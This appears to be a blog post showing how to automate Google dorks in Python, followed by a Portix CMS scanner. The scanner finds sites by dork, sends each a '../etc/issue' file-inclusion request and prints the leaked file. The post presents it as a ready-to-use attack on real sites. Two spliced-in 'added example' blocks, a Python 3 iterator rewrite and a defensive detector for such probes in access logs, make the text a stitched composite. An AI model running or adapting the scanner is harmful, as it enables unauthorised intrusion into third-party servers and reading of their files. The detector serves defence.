[PYTHON] write your vulnerability scanner using google
Today a lot of Google dorks come out, but it's more convenient if you can use them in an automatic way: using the Google search engine to find vulnerable targets, executing exploit commands, then sending a mail with the list of targets, for example.
The Python language can be really handy for such a task.
First I imagine my Google search interface and write the code against it. I want an interface like this:
#!/usr/bin/python
import google

for r in google.search(<GOOGLE_DORK>):
    # <DO_NASTY_THINGS>
    print 'title:', r.title
    print 'url:', r.url
    print 'desc:', r.desc
    print '---'
The code that implements the interface uses the xgoogle library (http://www.catonmat.net/blog/python-lib ... le-search/), which handles the Google engine part. The file google.py implements the interface:

from xgoogle.search import GoogleSearch, SearchError


class result:
    """One search hit: title, description and URL."""
    def __init__(self, title, desc, url):
        self.title = title
        self.desc = desc
        self.url = url

    def __str__(self):
        return 'title: %s\nurl: %s\ndesc: %s' % (self.title, self.url, self.desc)


class results:
    """Iterator over search hits; fetches the next result page on demand."""
    def __init__(self, gs):
        self.gs = gs
        self.res = gs.get_results()

    def __iter__(self):
        self._it = 0
        return self

    def next(self):
        if self._it >= len(self.res):
            # current page exhausted: ask xgoogle for the next one
            try:
                self.res = self.gs.get_results()
            except SearchError:
                raise StopIteration
            self._it = 0
            if not self.res:
                # no more pages: end the iteration instead of returning None forever
                raise StopIteration
        r = result(
            self.res[self._it].title.encode('utf8'),
            self.res[self._it].desc.encode('utf8'),
            self.res[self._it].url.encode('utf8'))
        self._it += 1
        return r


def search(word):
    gs = GoogleSearch(word, random_agent=True)
    gs.results_per_page = 10
    return results(gs)
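The interesting part of google.py is the lazy paging iterator: the for-loop only triggers a fetch of the next result page when the current one runs out, and the loop must stop cleanly when the backend has nothing left. The following is an added example (not the post's google.py and not xgoogle's code) that rewrites the same `results` design for Python 3 against a pluggable backend, with the end-of-results and fetch-failure cases handled explicitly. `FakeBackend` and its canned pages are constructed stand-ins for xgoogle's `GoogleSearch`, so the code runs offline.

```python
"""Lazy, page-by-page iterator over a pluggable search backend (added example).

Mirrors the post's `results` class: a page is fetched only when the current one
is exhausted, and an empty page or a failed fetch ends the iteration. The
FakeBackend is a constructed stand-in for xgoogle's GoogleSearch.
"""
from dataclasses import dataclass


@dataclass
class Result:
    title: str
    url: str
    desc: str


class FakeBackend:
    """Constructed stand-in for a paged search API (hypothetical).

    Each get_results() call returns the next page; an empty list means the
    search is exhausted, which is the case the post's next() did not handle.
    """

    def __init__(self, pages):
        self._pages = list(pages)
        self.calls = 0  # number of page fetches made (checked by the test)

    def get_results(self):
        self.calls += 1
        if not self._pages:
            return []
        return self._pages.pop(0)


class SearchResults:
    """Iterator that fetches the next page only when the current one runs out."""

    def __init__(self, backend):
        self._backend = backend
        self._page = []
        self._pos = 0
        self._exhausted = False

    def __iter__(self):
        return self

    def __next__(self):
        if self._pos >= len(self._page):
            if self._exhausted:
                raise StopIteration
            try:
                self._page = self._backend.get_results()
            except Exception:  # a failed fetch ends the iteration, as in the post
                self._page = []
            self._pos = 0
            if not self._page:  # empty page: no more results, stop instead of spinning
                self._exhausted = True
                raise StopIteration
        raw = self._page[self._pos]
        self._pos += 1
        return Result(title=raw["title"], url=raw["url"], desc=raw["desc"])


def search(backend):
    """Same entry-point shape as the post's google.search(), backend injected."""
    return SearchResults(backend)


def collect_urls(backend):
    """Drain the iterator and return the hit URLs, deduplicated in order."""
    seen = []
    for r in search(backend):
        if r.url not in seen:
            seen.append(r.url)
    return seen


def demo_backend():
    """Constructed sample data: a page of three hits, a page of one, then nothing."""
    page1 = [{"title": "a", "url": "http://example.test/a", "desc": "first"},
             {"title": "b", "url": "http://example.test/b", "desc": "second"},
             {"title": "a-dup", "url": "http://example.test/a", "desc": "duplicate"}]
    page2 = [{"title": "c", "url": "http://example.test/c", "desc": "third"}]
    return FakeBackend([page1, page2])


if __name__ == "__main__":
    for r in search(demo_backend()):
        print("title:", r.title)
        print("url:", r.url)
        print("desc:", r.desc)
        print("---")
```

Swapping `FakeBackend` for a real client only requires an object with a `get_results()` method that returns an empty sequence once the pages are exhausted; the calling code keeps the same for-loop shape as the interface sketched at the top of the post.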
You can now write your own scanner easily. For instance, this is the code to build a Portix CMS vulnerability scanner (http://www.exploit-db.com/exploits/17515/):

#!/usr/bin/python
import re
import google
import url_util


def get_base(url):
    # everything before 'livriel.php?livriel=' is the site base
    return re.search(r'^(\S+)livriel.php\?livriel=', url).groups()[0]


url_analysed = []
for r in google.search('inurl:livriel.php?livriel='):
    try:
        url_base = get_base(r.url)
        if url_base in url_analysed:
            continue
        url_analysed.append(url_base)
        url = url_base + '/print.php?page=../../../../../../../../../../etc/issue'
        soup = url_util.Request().get_soup(url)
        if soup.prettify().find('failed to open stream:') >= 0:
            continue
    except:
        continue
    print url_base
    print soup.contents[len(soup.contents)-1]
    print '---'
The url_util module was written by me. I create my own interfaces:
- to reduce the code as much as possible
- to abstract the library used underneath, so I don't care which library I use and I don't need to remember how to use it, because I use my own interface. It's easier to remember how to use your own code; you get fewer "WTF?" or "What the hell does this code do?" moments.
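From the other side of the wire, the probe the scanner above sends (a `print.php?page=` request whose value walks up with `../` to a system file) lands in the target's web server access log, which is where a defender catches it. The following is an added example, not from the post, that flags such local-file-inclusion probes in combined-format log lines, decoding percent-encoding (including double encoding) before matching. The log lines are constructed samples.

```python
"""Flag directory-traversal / LFI probes in web access logs (added example).

Parses Apache/nginx combined-format lines, decodes the request target and
reports requests whose path or query values contain a traversal sequence or
point at a system directory. The SAMPLE_LOG lines are constructed.
"""
import re
from urllib.parse import unquote, urlsplit, parse_qsl

COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

TRAVERSAL = re.compile(r'(^|/)\.\.(/|$)')
SENSITIVE_PATHS = ('/etc/', '/proc/', '/windows/')


def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (%252e%252e%252f -> ../)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return the sorted list of reasons the request target looks like an LFI probe."""
    reasons = []
    parts = urlsplit(target)
    candidates = [fully_decode(parts.path)]
    candidates += [fully_decode(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    for c in candidates:
        c = c.replace('\\', '/')  # treat backslash traversal the same way
        if TRAVERSAL.search(c):
            reasons.append('traversal')
        if any(s in c.lower() for s in SENSITIVE_PATHS):
            reasons.append('sensitive-path')
    return sorted(set(reasons))


def scan_log(lines):
    """Parse combined-format lines; return (ip, target, reasons) for each hit."""
    hits = []
    for line in lines:
        m = COMBINED_LOG.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = classify_request(m.group('target'))
        if reasons:
            hits.append((m.group('ip'), m.group('target'), reasons))
    return hits


# Constructed sample lines: a normal page view, the raw probe, an encoded probe.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2012:10:00:01 +0000] "GET /livriel.php?livriel=3 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Jan/2012:10:00:02 +0000] "GET /print.php?page=../../../../../../../../../../etc/issue HTTP/1.1" 200 312',
    '198.51.100.7 - - [10/Jan/2012:10:00:03 +0000] "GET /print.php?page=..%252f..%252fetc%252fissue HTTP/1.1" 404 221',
]

if __name__ == '__main__':
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, ','.join(reasons), target)
```

The decode-before-match step matters: a single `unquote` would leave the double-encoded probe as `..%2f..%2f` and the traversal regex would miss it. Matching on the decoded query values rather than the raw line also keeps the rule independent of which parameter name the application uses.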